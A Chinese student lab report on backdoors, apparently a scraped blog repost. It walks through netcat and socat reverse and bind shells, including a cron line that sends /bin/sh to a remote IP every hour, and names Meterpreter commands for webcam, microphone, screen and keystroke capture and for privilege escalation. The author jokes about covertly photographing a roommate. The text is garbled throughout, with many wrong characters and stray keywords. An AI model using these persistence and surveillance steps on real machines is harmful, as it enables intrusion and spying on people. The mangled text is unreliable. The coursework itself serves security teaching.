20155308 《网络攻防》 Exp2 后门原理与实践

20155308 《网络攻防》 Exp2 后门原理与实践

学习内容:使用nc实现win,mac,Linux间的后门链接linux

:meterpraeter的应用web

:MSF POST 模块的应用shell

学习目标:创建一个后门链接是如此的简单,功能又如此强大。经过亲手实践并了解这一事实,从而提升本身的安全意识 。vim

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
  • 在网上下载软件的时候,有一些捆绑软件一块儿下载;
  • 在输入网页的时候不当心打错了地址,而后进入了一个和本身目标网页类似的携带木马的网站。
  • 网页上弹出的小广告,在关闭的时候,不当心点进去。
  • 本身的U盘被人植入了木马

2.例举你知道的后门如何启动起来(win及linux)的方式?windows

  • 对后门程序进行假装,诱骗用户点击启动;

3.Meterpreter有哪些给你映像深入的功能?安全

  • 直接经过指令获取主机的摄像头让我佷感兴趣,以为若是这块命令掌握的好的话,能够偷偷照点室友的丑照。

4.如何发现本身有系统有没有被安装后门?网络

  • 常常查看本身的文件夹有没有陌生的文件。可是这个办法很笨。。。
  • 检查防火墙开启的端口和它对应的进程,若是不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析;
  • 下载监控软件,看是否存在异常。

NC 或 netcat

是一个底层工具,进行基本的TCP UDP数据收发。常被与其余工具结合使用,起到后门的做用。tcp

  • Linux: 通常自带netcat,"man netcat" 或"man nc"可查看其使用说明。
  • Windows: 课程主页附件中下载ncat.rar解压便可使用。
  • Mac: 系统自带,"man nc",查看其使用说明。编辑器

    Win得到Linux Shell

  • 在Windows下,先使用ipconfig指令查看本机IP工具


  • 课程主页附件中下载ncat.rar解压便可使用。
  1. windows 打开监听

  1. Linux反弹链接win

  1. windows下得到一个linux shell,可运行任何指令,如ls

Linux得到Windows Shell

  • 在Kali环境下用ifconfig查看IP

  1. Linux运行监听指令

  1. Windows反弹链接Linux

  1. Linux下看到Windows的命令提示

nc传输数据

  • Windows下监听5308端口

  • Kali下链接到Windows的5308端口

  • 数据传输成功!


实验内容

使用netcat获取主机操做Shell,cron启动

  • 在Windows系统下,监听5308端口

  • 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中咱们能够知道crontab指令能够用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供以后读取和执行

  • 用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器

  • 在最后一行添加32 * * * * /bin/netcat 192.168.44.129 5208 -e /bin/sh,意思是在每一个小时的第32分钟反向链接Windows主机的5308端口

  • 32分后,此时已经得到了Kali的shell,能够输入指令输出结果:

作到这部分的以后,我在虚拟机上下载server 2008,kali直接崩掉了,我又从新下载了一次kali,地址就变化了。新的地址是

使用socat获取主机操做Shell, 任务计划启动

预备知识;

  • socat是ncat的加强版,它使用的格式是socat [options] ,其中两个address是必选项,而options 是可选项。

  • socat的基本功能就是创建两个双向的字节流,数据就在其间传输,参数address就是表明了其中的一个方向。所谓流,表明了数据的流向,而数据则能够有许多不一样的类型,命令中也就相应须要许多选项对各类不一样的类型数据流进行限定与说明。

实践过程:

  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,建立任务,填写任务名称后,新建一个触发器:

  1. 在操做->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5308 exec:cmd.exe,pty,stderr,这个命令的做用是把cmd.exe绑定到端口5308,同时把cmd.exe的stderr重定向到stdout上:

  1. 建立完成以后,按Windows+L快捷键锁定计算机,再次打开时,能够发现以前建立的任务已经开始运行:

此时能够发现已经成功得到了一个cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.输入指令生成后门程序:

2.经过nc指令将生成的后门程序传送到Windows主机上:


3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

4.设置完成后,执行监听:

5.打开Windows上的后门程序:

6.此时Kali上已经得到了Windows主机的链接,而且获得了远程控制的shell:

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令能够截获一段音频:

  1. 使用webcam_snap指令可使用摄像头进行拍照:

  1. 使用webcam stream指令可使用摄像头进行录像:

  1. 使用screenshot指令能够进行截屏:

  1. 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  1. 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

体会

本次实验比较简单,可是主要的是本身在操做上有很大的问题,而后作到最后,虚拟机由于同时运行不少的虚拟机,因此系统卡了,整个虚拟机崩了。我就作了好几遍,才出来如今的效果。经过本次实验,我遇到了不少的问题,其中一些的问题,是同窗们都没遇到,我上网也查了,也不知道怎么解决。。。。。。可是后来我发现,有的时候重开虚拟机,不少问题就莫名其妙就解决了,这也是让我很无语的地方。

相关文章
相关标签/搜索